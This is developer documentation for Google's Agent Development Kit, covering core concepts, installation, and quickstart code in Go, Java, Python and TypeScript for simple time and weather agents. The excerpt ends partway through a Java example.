# Agent Development Kit > Build powerful multi-agent systems with Agent Development Kit An open-source, code-first toolkit for building, evaluating, and deploying sophisticated AI agents with flexibility and control. # Build Agents # Get started Agent Development Kit (ADK) is designed to empower developers to quickly build, manage, evaluate and deploy AI-powered agents. These quick start guides get you set up and running a simple agent in less than 20 minutes. - **Python Quickstart** ______________________________________________________________________ Create your first Python ADK agent in minutes. [Start with Python](https://google.github.io/adk-docs/get-started/python/index.md) - **Go Quickstart** ______________________________________________________________________ Create your first Go ADK agent in minutes. [Start with Go](https://google.github.io/adk-docs/get-started/go/index.md) - **Java Quickstart** ______________________________________________________________________ Create your first Java ADK agent in minutes. [Start with Java](https://google.github.io/adk-docs/get-started/java/index.md) - **TypeScript Quickstart** ______________________________________________________________________ Create your first TypeScript ADK agent in minutes. [Start with TypeScript](https://google.github.io/adk-docs/get-started/typescript/index.md) # Agent Development Kit (ADK) **Build, Evaluate and Deploy agents, seamlessly!** ADK is designed to empower developers to build, manage, evaluate and deploy AI-powered agents. It provides a robust and flexible environment for creating both conversational and non-conversational agents, capable of handling complex tasks and workflows. ## Core Concepts ADK is built around a few key primitives and concepts that make it powerful and flexible. Here are the essentials: - **Agent:** The fundamental worker unit designed for specific tasks. 
Agents can use language models (`LlmAgent`) for complex reasoning, or act as deterministic controllers of the execution, which are called "[workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md)" (`SequentialAgent`, `ParallelAgent`, `LoopAgent`). - **Tool:** Gives agents abilities beyond conversation, letting them interact with external APIs, search information, run code, or call other services. - **Callbacks:** Custom code snippets you provide to run at specific points in the agent's process, allowing for checks, logging, or behavior modifications. - **Session Management (`Session` & `State`):** Handles the context of a single conversation (`Session`), including its history (`Events`) and the agent's working memory for that conversation (`State`). - **Memory:** Enables agents to recall information about a user across *multiple* sessions, providing long-term context (distinct from short-term session `State`). - **Artifact Management (`Artifact`):** Allows agents to save, load, and manage files or binary data (like images, PDFs) associated with a session or user. - **Code Execution:** The ability for agents (usually via Tools) to generate and execute code to perform complex calculations or actions. - **Planning:** An advanced capability where agents can break down complex goals into smaller steps and plan how to achieve them like a ReAct planner. - **Models:** The underlying LLM that powers `LlmAgent`s, enabling their reasoning and language understanding abilities. - **Event:** The basic unit of communication representing things that happen during a session (user message, agent reply, tool use), forming the conversation history. - **Runner:** The engine that manages the execution flow, orchestrates agent interactions based on Events, and coordinates with backend services. 
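To make the relationship between `Session`, `State`, `Event`, and `Runner` more concrete, here is a toy sketch in plain Python. It does not use ADK's classes or API; every name in it (`ToyEvent`, `ToySession`, `toy_runner`, `counting_agent`) is hypothetical and exists only to illustrate the ideas in the list above.

```python
from dataclasses import dataclass, field
from typing import Any, Callable


@dataclass
class ToyEvent:
    """One thing that happened in a conversation (hypothetical, not ADK's Event)."""
    author: str  # "user" or "agent"
    text: str


@dataclass
class ToySession:
    """Context of a single conversation (hypothetical, not ADK's Session)."""
    events: list[ToyEvent] = field(default_factory=list)  # conversation history
    state: dict[str, Any] = field(default_factory=dict)   # short-term working memory


def toy_runner(session: ToySession,
               agent: Callable[[ToySession, str], str],
               user_text: str) -> str:
    """Records the user message, calls the agent, and records its reply."""
    session.events.append(ToyEvent("user", user_text))
    reply = agent(session, user_text)
    session.events.append(ToyEvent("agent", reply))
    return reply


def counting_agent(session: ToySession, user_text: str) -> str:
    """A deterministic stand-in for an agent that keeps a turn counter in state."""
    turn = session.state.get("turn", 0) + 1
    session.state["turn"] = turn
    return f"turn {turn}: you said {user_text!r}"
```

Calling `toy_runner` twice on the same `ToySession` leaves four events in the history and a turn counter of 2 in the state, which mirrors how history and working memory accumulate within one conversation.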
***Note:** Features like Multimodal Streaming, Evaluation, Deployment, Debugging, and Trace are also part of the broader ADK ecosystem, supporting real-time interaction and the development lifecycle.* ## Key Capabilities ADK offers several key advantages for developers building agentic applications: 1. **Multi-Agent System Design:** Easily build applications composed of multiple, specialized agents arranged hierarchically. Agents can coordinate complex tasks, delegate sub-tasks using LLM-driven transfer or explicit `AgentTool` invocation, enabling modular and scalable solutions. 1. **Rich Tool Ecosystem:** Equip agents with diverse capabilities. ADK supports integrating custom functions (`FunctionTool`), using other agents as tools (`AgentTool`), leveraging built-in functionalities like code execution, and interacting with external data sources and APIs (e.g., Search, Databases). Support for long-running tools allows handling asynchronous operations effectively. 1. **Flexible Orchestration:** Define complex agent workflows using built-in workflow agents (`SequentialAgent`, `ParallelAgent`, `LoopAgent`) alongside LLM-driven dynamic routing. This allows for both predictable pipelines and adaptive agent behavior. 1. **Integrated Developer Tooling:** Develop and iterate locally with ease. ADK includes tools like a command-line interface (CLI) and a Developer UI for running agents, inspecting execution steps (events, state changes), debugging interactions, and visualizing agent definitions. 1. **Native Streaming Support:** Build real-time, interactive experiences with native support for bidirectional streaming (text and audio). This integrates seamlessly with underlying capabilities like the [Multimodal Live API for the Gemini Developer API](https://ai.google.dev/gemini-api/docs/live) (or for [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/multimodal-live)), often enabled with simple configuration changes. 1. 
**Built-in Agent Evaluation:** Assess agent performance systematically. The framework includes tools to create multi-turn evaluation datasets and run evaluations locally (via CLI or the dev UI) to measure quality and guide improvements. 1. **Broad LLM Support:** While optimized for Google's Gemini models, the framework is designed for flexibility, allowing integration with various LLMs (potentially including open-source or fine-tuned models) through its `BaseLlm` interface. 1. **Artifact Management:** Enable agents to handle files and binary data. The framework provides mechanisms (`ArtifactService`, context methods) for agents to save, load, and manage versioned artifacts like images, documents, or generated reports during their execution. 1. **Extensibility and Interoperability:** ADK promotes an open ecosystem. While providing core tools, it allows developers to easily integrate and reuse third-party tools and data connectors. 1. **State and Memory Management:** Automatically handles short-term conversational memory (`State` within a `Session`) managed by the `SessionService`. Provides integration points for longer-term `Memory` services, allowing agents to recall user information across multiple sessions. ## Get Started - Ready to build your first agent? [Try the quickstart](https://google.github.io/adk-docs/get-started/quickstart/index.md) # Go Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit for Go. 
Before you start, make sure you have the following installed: - Go 1.24.4 or later - ADK Go v0.2.0 or later ## Create an agent project Create an agent project with the following files and directory structure: ```text my_agent/ agent.go # main agent code .env # API keys or project IDs ``` Create this project structure using the command line ```console mkdir my_agent\ type nul > my_agent\agent.go type nul > my_agent\env.bat ``` ```bash mkdir -p my_agent/ && \ touch my_agent/agent.go && \ touch my_agent/.env ``` ### Define the agent code Create the code for a basic agent that uses the built-in [Google Search tool](/adk-docs/tools/built-in-tools/#google-search). Add the following code to the `my_agent/agent.go` file in your project directory: my_agent/agent.go ```go package main import ( "context" "log" "os" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/cmd/launcher" "google.golang.org/adk/cmd/launcher/full" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" "google.golang.org/adk/tool/geminitool" "google.golang.org/genai" ) func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, "gemini-3-pro-preview", &genai.ClientConfig{ APIKey: os.Getenv("GOOGLE_API_KEY"), }) if err != nil { log.Fatalf("Failed to create model: %v", err) } timeAgent, err := llmagent.New(llmagent.Config{ Name: "hello_time_agent", Model: model, Description: "Tells the current time in a specified city.", Instruction: "You are a helpful assistant that tells the current time in a city.", Tools: []tool.Tool{ geminitool.GoogleSearch{}, }, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } config := &launcher.Config{ AgentLoader: agent.NewSingleLoader(timeAgent), } l := full.NewLauncher() if err = l.Execute(ctx, config, os.Args[1:]); err != nil { log.Fatalf("Run failed: %v\n\n%s", err, l.CommandLineSyntax()) } } ``` ### Configure project and dependencies Use the `go mod` command to initialize the project 
modules and install the required packages based on the `import` statements in your agent code file:

```console
go mod init my-agent/main
go mod tidy
```

### Set your API key

This project uses the Gemini API, which requires an API key. If you don't already have a Gemini API key, create one in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page.

In a terminal window, write your API key into the `.env` file (macOS and Linux) or the `env.bat` file (Windows) of your project to set environment variables:

Update: my_agent/.env

```bash
echo 'export GOOGLE_API_KEY="YOUR_API_KEY"' > .env
```

Update: my_agent/env.bat

```console
(echo set GOOGLE_API_KEY=YOUR_API_KEY) > env.bat
```

Using other AI models with ADK

ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models).

## Run your agent

You can run your ADK agent using the interactive command-line interface you defined or the ADK web user interface provided by the ADK Go command-line tool. Both options let you test and interact with your agent.

### Run with command-line interface

Run your agent using the following Go command:

Run from: my_agent/ directory

```console
# Remember to load keys and settings: source .env OR env.bat
go run agent.go
```

### Run with web interface

Run your agent with the ADK web interface using the following Go command:

Run from: my_agent/ directory

```console
# Remember to load keys and settings: source .env OR env.bat
go run agent.go web api webui
```

This command starts a web server with a chat interface for your agent. You can access the web interface at http://localhost:8080. Select your agent at the upper left corner and type a request.

Caution: ADK Web for development only

ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only.
## Next: Build your agent

Now that you have ADK installed and your first agent running, try building your own agent with our build guides:

- [Build your agent](/adk-docs/tutorials/)

# Installing ADK

## Create & activate virtual environment

We recommend creating a virtual Python environment using [venv](https://docs.python.org/3/library/venv.html):

```shell
python -m venv .venv
```

Now you can activate the virtual environment using the appropriate command for your operating system and environment:

```text
# Mac / Linux
source .venv/bin/activate

# Windows CMD:
.venv\Scripts\activate.bat

# Windows PowerShell:
.venv\Scripts\Activate.ps1
```

### Install ADK

```bash
pip install google-adk
```

(Optional) Verify your installation:

```bash
pip show google-adk
```

### Install ADK and ADK DevTools

```bash
npm install @google/adk @google/adk-devtools
```

## Create a new Go module

If you are starting a new project, you can create a new Go module:

```shell
go mod init example.com/my-agent
```

## Install ADK

To add ADK to your project, run the following command:

```shell
go get google.golang.org/adk
```

This adds ADK as a dependency to your `go.mod` file.

(Optional) Verify your installation by checking your `go.mod` file for the `google.golang.org/adk` entry.

For Java, you can use either Maven or Gradle to add the `google-adk` and `google-adk-dev` packages.

`google-adk` is the core Java ADK library. Java ADK also comes with a pluggable example Spring Boot server for running your agents. This optional server is part of the `google-adk-dev` package.

If you are using Maven, add the following to your `pom.xml`:

pom.xml

```xml
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>com.example.agent</groupId>
  <artifactId>adk-agents</artifactId>
  <version>1.0-SNAPSHOT</version>

  <properties>
    <maven.compiler.source>17</maven.compiler.source>
    <maven.compiler.target>17</maven.compiler.target>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <dependencies>
    <!-- Core ADK library -->
    <dependency>
      <groupId>com.google.adk</groupId>
      <artifactId>google-adk</artifactId>
      <version>0.5.0</version>
    </dependency>
    <!-- Optional development server -->
    <dependency>
      <groupId>com.google.adk</groupId>
      <artifactId>google-adk-dev</artifactId>
      <version>0.5.0</version>
    </dependency>
  </dependencies>
</project>
```

Here's a [complete pom.xml](https://github.com/google/adk-docs/tree/main/examples/java/cloud-run/pom.xml) file for reference.
If you are using gradle, add the dependency to your build.gradle: build.gradle ```text dependencies { implementation 'com.google.adk:google-adk:0.5.0' implementation 'com.google.adk:google-adk-dev:0.5.0' } ``` You should also configure Gradle to pass `-parameters` to `javac`. (Alternatively, use `@Schema(name = "...")`). ## Next steps - Try creating your first agent with the [**Quickstart**](https://google.github.io/adk-docs/get-started/quickstart/index.md) # Java Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit for Java. Before you start, make sure you have the following installed: - Java 17 or later - Maven 3.9 or later ## Create an agent project Create an agent project with the following files and directory structure: ```text my_agent/ src/main/java/com/example/agent/ HelloTimeAgent.java # main agent code AgentCliRunner.java # command-line interface pom.xml # project configuration .env # API keys or project IDs ``` Create this project structure using the command line ```console mkdir my_agent\src\main\java\com\example\agent type nul > my_agent\src\main\java\com\example\agent\HelloTimeAgent.java type nul > my_agent\src\main\java\com\example\agent\AgentCliRunner.java type nul > my_agent\pom.xml type nul > my_agent\.env ``` ```bash mkdir -p my_agent/src/main/java/com/example/agent && \ touch my_agent/src/main/java/com/example/agent/HelloTimeAgent.java && \ touch my_agent/src/main/java/com/example/agent/AgentCliRunner.java && \ touch my_agent/pom.xml my_agent/.env ``` ### Define the agent code Create the code for a basic agent, including a simple implementation of an ADK [Function Tool](/adk-docs/tools-custom/function-tools/), called `getCurrentTime()`. 
Add the following code to the `HelloTimeAgent.java` file in your project directory:

my_agent/src/main/java/com/example/agent/HelloTimeAgent.java

```java
package com.example.agent;

import com.google.adk.agents.BaseAgent;
import com.google.adk.agents.LlmAgent;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.FunctionTool;

import java.util.Map;

public class HelloTimeAgent {

    public static BaseAgent ROOT_AGENT = initAgent();

    private static BaseAgent initAgent() {
        return LlmAgent.builder()
            .name("hello-time-agent")
            .description("Tells the current time in a specified city")
            .instruction("""
                You are a helpful assistant that tells the current time in a city.
                Use the 'getCurrentTime' tool for this purpose.
                """)
            .model("gemini-2.5-flash")
            .tools(FunctionTool.create(HelloTimeAgent.class, "getCurrentTime"))
            .build();
    }

    /** Mock tool implementation */
    @Schema(description = "Get the current time for a given city")
    public static Map<String, String> getCurrentTime(
        @Schema(name = "city", description = "Name of the city to get the time for") String city) {
        return Map.of(
            "city", city,
            "forecast", "The time is 10:30am."
        );
    }
}
```

Caution: Gemini 3 compatibility

ADK Java v0.3.0 and lower is not compatible with [Gemini 3 Pro Preview](https://ai.google.dev/gemini-api/docs/models#gemini-3-pro) due to thought signature changes for function calling. Use Gemini 2.5 or lower models instead.
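### Configure project and dependencies

An ADK agent project requires this dependency in your `pom.xml` project file:

my_agent/pom.xml (partial)

```xml
<dependencies>
  <dependency>
    <groupId>com.google.adk</groupId>
    <artifactId>google-adk</artifactId>
    <version>0.5.0</version>
  </dependency>
</dependencies>
```

Update the `pom.xml` project file to include this dependency and additional settings with the following configuration code:

Complete `pom.xml` configuration for project

The following code shows a complete `pom.xml` configuration for this project:

my_agent/pom.xml

```xml
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>com.example.agent</groupId>
  <artifactId>adk-agents</artifactId>
  <version>1.0-SNAPSHOT</version>

  <properties>
    <maven.compiler.source>17</maven.compiler.source>
    <maven.compiler.target>17</maven.compiler.target>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <dependencies>
    <dependency>
      <groupId>com.google.adk</groupId>
      <artifactId>google-adk</artifactId>
      <version>0.5.0</version>
    </dependency>
    <dependency>
      <groupId>com.google.adk</groupId>
      <artifactId>google-adk-dev</artifactId>
      <version>0.5.0</version>
    </dependency>
  </dependencies>
</project>
```

### Set your API key

This project uses the Gemini API, which requires an API key. If you don't already have a Gemini API key, create one in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page.

In a terminal window, write your API key into the `.env` file (or `env.bat` on Windows) of your project to set environment variables:

Update: my_agent/.env

```bash
echo 'export GOOGLE_API_KEY="YOUR_API_KEY"' > .env
```

Update: my_agent/env.bat

```console
(echo set GOOGLE_API_KEY=YOUR_API_KEY) > env.bat
```

Using other AI models with ADK

ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models).

### Create an agent command-line interface

Create an `AgentCliRunner.java` class that lets you run and interact with `HelloTimeAgent` from the command line. This code shows how to create a `RunConfig` object to run the agent and a `Session` object to interact with the running agent.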
my_agent/src/main/java/com/example/agent/AgentCliRunner.java

```java
package com.example.agent;

import com.google.adk.agents.RunConfig;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.sessions.Session;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.reactivex.rxjava3.core.Flowable;
import java.util.Scanner;

import static java.nio.charset.StandardCharsets.UTF_8;

public class AgentCliRunner {

    public static void main(String[] args) {
        RunConfig runConfig = RunConfig.builder().build();
        InMemoryRunner runner = new InMemoryRunner(HelloTimeAgent.ROOT_AGENT);

        Session session = runner
                .sessionService()
                .createSession(runner.appName(), "user1234")
                .blockingGet();

        try (Scanner scanner = new Scanner(System.in, UTF_8)) {
            while (true) {
                System.out.print("\nYou > ");
                String userInput = scanner.nextLine();
                if ("quit".equalsIgnoreCase(userInput)) {
                    break;
                }

                Content userMsg = Content.fromParts(Part.fromText(userInput));
                Flowable<Event> events =
                        runner.runAsync(session.userId(), session.id(), userMsg, runConfig);

                System.out.print("\nAgent > ");
                // Print only the final response of each turn.
                events.blockingForEach(event -> {
                    if (event.finalResponse()) {
                        System.out.println(event.stringifyContent());
                    }
                });
            }
        }
    }
}
```

## Run your agent

You can run your ADK agent using either the `AgentCliRunner` command-line class you defined or the ADK web user interface, which is provided by the `AdkWebServer` class. Both options let you test and interact with your agent.
### Run with command-line interface Run your agent with the command-line interface `AgentCliRunner` class using the following Maven command: ```console # Remember to load keys and settings: source .env OR env.bat mvn compile exec:java -Dexec.mainClass="com.example.agent.AgentCliRunner" ``` ### Run with web interface Run your agent with the ADK web interface using the following Maven command: ```console # Remember to load keys and settings: source .env OR env.bat mvn compile exec:java \ -Dexec.mainClass="com.google.adk.web.AdkWebServer" \ -Dexec.args="--adk.agents.source-dir=target --server.port=8000" ``` This command starts a web server with a chat interface for your agent. You can access the web interface at (http://localhost:8000). Select your agent at the upper left corner and type a request. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Next: Build your agent Now that you have ADK installed and your first agent running, try building your own agent with our build guides: - [Build your agent](/adk-docs/tutorials/) # Python Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit (ADK) for Python. Before you start, make sure you have the following installed: - Python 3.10 or later - `pip` for installing packages ## Installation Install ADK by running the following command: ```shell pip install google-adk ``` Recommended: create and activate a Python virtual environment Create a Python virtual environment: ```shell python -m venv .venv ``` Activate the Python virtual environment: ```console .venv\Scripts\activate.bat ``` ```console .venv\Scripts\Activate.ps1 ``` ```bash source .venv/bin/activate ``` ## Create an agent project Run the `adk create` command to start a new agent project. 
```shell
adk create my_agent
```

### Explore the agent project

The created agent project has the following structure, with the `agent.py` file containing the main control code for the agent.

```text
my_agent/
    agent.py      # main agent code
    .env          # API keys or project IDs
    __init__.py
```

## Update your agent project

The `agent.py` file contains a `root_agent` definition, which is the only required element of an ADK agent. You can also define tools for the agent to use. Update the generated `agent.py` code to include a `get_current_time` tool for use by the agent, as shown in the following code:

```python
from google.adk.agents.llm_agent import Agent


# Mock tool implementation
def get_current_time(city: str) -> dict:
    """Returns the current time in a specified city."""
    return {"status": "success", "city": city, "time": "10:30 AM"}


root_agent = Agent(
    model='gemini-3-flash-preview',
    name='root_agent',
    description="Tells the current time in a specified city.",
    instruction="You are a helpful assistant that tells the current time in cities. Use the 'get_current_time' tool for this purpose.",
    tools=[get_current_time],
)
```

### Set your API key

This project uses the Gemini API, which requires an API key. If you don't already have a Gemini API key, create one in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page.

In a terminal window, write your API key into the `.env` file as an environment variable:

Update: my_agent/.env

```console
echo 'GOOGLE_API_KEY="YOUR_API_KEY"' > .env
```

Using other AI models with ADK

ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models).

## Run your agent

You can run your ADK agent with an interactive command-line interface using the `adk run` command, or with the ADK web user interface using the `adk web` command. Both options let you test and interact with your agent.
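Before running the agent, note that the `get_current_time` tool defined earlier is a mock that always reports 10:30 AM. As a minimal sketch of a non-mock variant, the function below looks up the real time with the standard-library `zoneinfo` module. The `CITY_TIMEZONES` table and the `error_message` field are assumptions made for this illustration and are not part of ADK or of the generated project.

```python
from datetime import datetime
from zoneinfo import ZoneInfo

# Hypothetical lookup table (not part of ADK); extend it with the cities you need.
CITY_TIMEZONES = {
    "new york": "America/New_York",
    "london": "Europe/London",
    "tokyo": "Asia/Tokyo",
}


def get_current_time(city: str) -> dict:
    """Returns the current time in a specified city."""
    tz_name = CITY_TIMEZONES.get(city.strip().lower())
    if tz_name is None:
        # Unknown city: report an error instead of guessing a timezone.
        return {
            "status": "error",
            "city": city,
            "error_message": f"No timezone information for {city}.",
        }
    now = datetime.now(ZoneInfo(tz_name))
    return {"status": "success", "city": city, "time": now.strftime("%I:%M %p")}
```

Because the function keeps the same name and signature as the mock, the `tools=[get_current_time]` entry in `root_agent` would not need to change.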
### Run with command-line interface

Run your agent using the `adk run` command-line tool.

```console
adk run my_agent
```

### Run with web interface

The ADK framework provides a web interface you can use to test and interact with your agent. You can start the web interface using the following command:

```console
adk web --port 8000
```

Note

Run this command from the **parent directory** that contains your `my_agent/` folder. For example, if your agent is inside `agents/my_agent/`, run `adk web` from the `agents/` directory.

This command starts a web server with a chat interface for your agent. You can access the web interface at http://localhost:8000. Select the agent at the upper left corner and type a request.

Caution: ADK Web for development only

ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only.

## Next: Build your agent

Now that you have ADK installed and your first agent running, try building your own agent with our build guides:

- [Build your agent](/adk-docs/tutorials/)

# Build a multi-tool agent

This quickstart guides you through installing the Agent Development Kit (ADK), setting up a basic agent with multiple tools, and running it locally, either in the terminal or in the interactive, browser-based dev UI.

This quickstart assumes a local IDE (VS Code, PyCharm, IntelliJ IDEA, etc.) with Python 3.10+ or Java 17+ and terminal access. This method runs the application entirely on your machine and is recommended for internal development.

## 1. 
Set up Environment & Install ADK Create & Activate Virtual Environment (Recommended): ```bash # Create python -m venv .venv # Activate (each new terminal) # macOS/Linux: source .venv/bin/activate # Windows CMD: .venv\Scripts\activate.bat # Windows PowerShell: .venv\Scripts\Activate.ps1 ``` Install ADK: ```bash pip install google-adk ``` Create a new project directory, initialize it, and install dependencies: ```bash mkdir my-adk-agent cd my-adk-agent npm init -y npm install @google/adk @google/adk-devtools npm install -D typescript ``` Create a `tsconfig.json` file with the following content. This configuration ensures your project correctly handles modern Node.js modules. tsconfig.json ```json { "compilerOptions": { "target": "es2020", "module": "nodenext", "moduleResolution": "nodenext", "esModuleInterop": true, "strict": true, "skipLibCheck": true, // set to false to allow CommonJS module syntax: "verbatimModuleSyntax": false } } ``` To install ADK and setup the environment, proceed to the following steps. ## 2. Create Agent Project ### Project structure You will need to create the following project structure: ```console parent_folder/ multi_tool_agent/ __init__.py agent.py .env ``` Create the folder `multi_tool_agent`: ```bash mkdir multi_tool_agent/ ``` Note for Windows users When using ADK on Windows for the next few steps, we recommend creating Python files using File Explorer or an IDE because the following commands (`mkdir`, `echo`) typically generate files with null bytes and/or incorrect encoding. ### `__init__.py` Now create an `__init__.py` file in the folder: ```shell echo "from . import agent" > multi_tool_agent/__init__.py ``` Your `__init__.py` should now look like this: multi_tool_agent/__init__.py ```python from . 
import agent ``` ### `agent.py` Create an `agent.py` file in the same folder: ```shell touch multi_tool_agent/agent.py ``` ```shell type nul > multi_tool_agent/agent.py ``` Copy and paste the following code into `agent.py`: multi_tool_agent/agent.py ```python import datetime from zoneinfo import ZoneInfo from google.adk.agents import Agent def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } def get_current_time(city: str) -> dict: """Returns the current time in a specified city. Args: city (str): The name of the city for which to retrieve the current time. Returns: dict: status and result or error msg. """ if city.lower() == "new york": tz_identifier = "America/New_York" else: return { "status": "error", "error_message": ( f"Sorry, I don't have timezone information for {city}." ), } tz = ZoneInfo(tz_identifier) now = datetime.datetime.now(tz) report = ( f'The current time in {city} is {now.strftime("%Y-%m-%d %H:%M:%S %Z%z")}' ) return {"status": "success", "report": report} root_agent = Agent( name="weather_time_agent", model="gemini-2.0-flash", description=( "Agent to answer questions about the time and weather in a city." ), instruction=( "You are a helpful agent who can answer user questions about the time and weather in a city." 
), tools=[get_weather, get_current_time], ) ``` ### `.env` Create a `.env` file in the same folder: ```shell touch multi_tool_agent/.env ``` ```shell type nul > multi_tool_agent\.env ``` More instructions about this file are described in the next section on [Set up the model](#set-up-the-model). You will need to create the following project structure in your `my-adk-agent` directory: ```console my-adk-agent/ agent.ts .env package.json tsconfig.json ``` ### `agent.ts` Create an `agent.ts` file in your project folder: ```shell touch agent.ts ``` ```shell type nul > agent.ts ``` Copy and paste the following code into `agent.ts`: agent.ts ```typescript import 'dotenv/config'; import { FunctionTool, LlmAgent } from '@google/adk'; import { z } from 'zod'; const getWeather = new FunctionTool({ name: 'get_weather', description: 'Retrieves the current weather report for a specified city.', parameters: z.object({ city: z.string().describe('The name of the city for which to retrieve the weather report.'), }), execute: ({ city }) => { if (city.toLowerCase() === 'new york') { return { status: 'success', report: 'The weather in New York is sunny with a temperature of 25 degrees Celsius (77 degrees Fahrenheit).', }; } else { return { status: 'error', error_message: `Weather information for '${city}' is not available.`, }; } }, }); const getCurrentTime = new FunctionTool({ name: 'get_current_time', description: 'Returns the current time in a specified city.', parameters: z.object({ city: z.string().describe("The name of the city for which to retrieve the current time."), }), execute: ({ city }) => { let tz_identifier: string; if (city.toLowerCase() === 'new york') { tz_identifier = 'America/New_York'; } else { return { status: 'error', error_message: `Sorry, I don't have timezone information for ${city}.`, }; } const now = new Date(); const report = `The current time in ${city} is ${now.toLocaleString('en-US', { timeZone: tz_identifier })}`; return { status: 'success', report: 
report };
  },
});

export const rootAgent = new LlmAgent({
  name: 'weather_time_agent',
  model: 'gemini-2.5-flash',
  description: 'Agent to answer questions about the time and weather in a city.',
  instruction: 'You are a helpful agent who can answer user questions about the time and weather in a city.',
  tools: [getWeather, getCurrentTime],
});
```

### `.env`

Create a `.env` file in the same folder:

```shell
touch .env
```

```shell
type nul > .env
```

More instructions about this file are described in the next section on [Set up the model](#set-up-the-model).

Java projects generally feature the following project structure:

```console
project_folder/
├── pom.xml (or build.gradle)
├── src/
│   └── main/
│       └── java/
│           └── agents/
│               └── multitool/
└── test/
```

### Create `MultiToolAgent.java`

Create a `MultiToolAgent.java` source file in the `agents.multitool` package in the `src/main/java/agents/multitool/` directory.

Copy and paste the following code into `MultiToolAgent.java`:

agents/multitool/MultiToolAgent.java

```java
package agents.multitool;

import com.google.adk.agents.BaseAgent;
import com.google.adk.agents.LlmAgent;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.FunctionTool;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.reactivex.rxjava3.core.Flowable;
import java.nio.charset.StandardCharsets;
import java.text.Normalizer;
import java.time.ZoneId;
import java.time.ZonedDateTime;
import java.time.format.DateTimeFormatter;
import java.util.Map;
import java.util.Scanner;

public class MultiToolAgent {

  private static String USER_ID = "student";
  private static String NAME = "multi_tool_agent";

  // To run your agent with Dev UI, the ROOT_AGENT should be a global public static final variable.
public static final BaseAgent ROOT_AGENT = initAgent(); public static BaseAgent initAgent() { return LlmAgent.builder() .name(NAME) .model("gemini-2.0-flash") .description("Agent to answer questions about the time and weather in a city.") .instruction( "You are a helpful agent who can answer user questions about the time and weather" + " in a city.") .tools( FunctionTool.create(MultiToolAgent.class, "getCurrentTime"), FunctionTool.create(MultiToolAgent.class, "getWeather")) .build(); } public static Map getCurrentTime( @Schema(name = "city", description = "The name of the city for which to retrieve the current time") String city) { String normalizedCity = Normalizer.normalize(city, Normalizer.Form.NFD) .trim() .toLowerCase() .replaceAll("(\\p{IsM}+|\\p{IsP}+)", "") .replaceAll("\\s+", "_"); return ZoneId.getAvailableZoneIds().stream() .filter(zid -> zid.toLowerCase().endsWith("/" + normalizedCity)) .findFirst() .map( zid -> Map.of( "status", "success", "report", "The current time in " + city + " is " + ZonedDateTime.now(ZoneId.of(zid)) .format(DateTimeFormatter.ofPattern("HH:mm")) + ".")) .orElse( Map.of( "status", "error", "report", "Sorry, I don't have timezone information for " + city + ".")); } public static Map getWeather( @Schema(name = "city", description = "The name of the city for which to retrieve the weather report") String city) { if (city.toLowerCase().equals("new york")) { return Map.of( "status", "success", "report", "The weather in New York is sunny with a temperature of 25 degrees Celsius (77 degrees" + " Fahrenheit)."); } else { return Map.of( "status", "error", "report", "Weather information for " + city + " is not available."); } } public static void main(String[] args) throws Exception { InMemoryRunner runner = new InMemoryRunner(ROOT_AGENT); Session session = runner .sessionService() .createSession(NAME, USER_ID) .blockingGet(); try (Scanner scanner = new Scanner(System.in, StandardCharsets.UTF_8)) { while (true) { System.out.print("\nYou > 
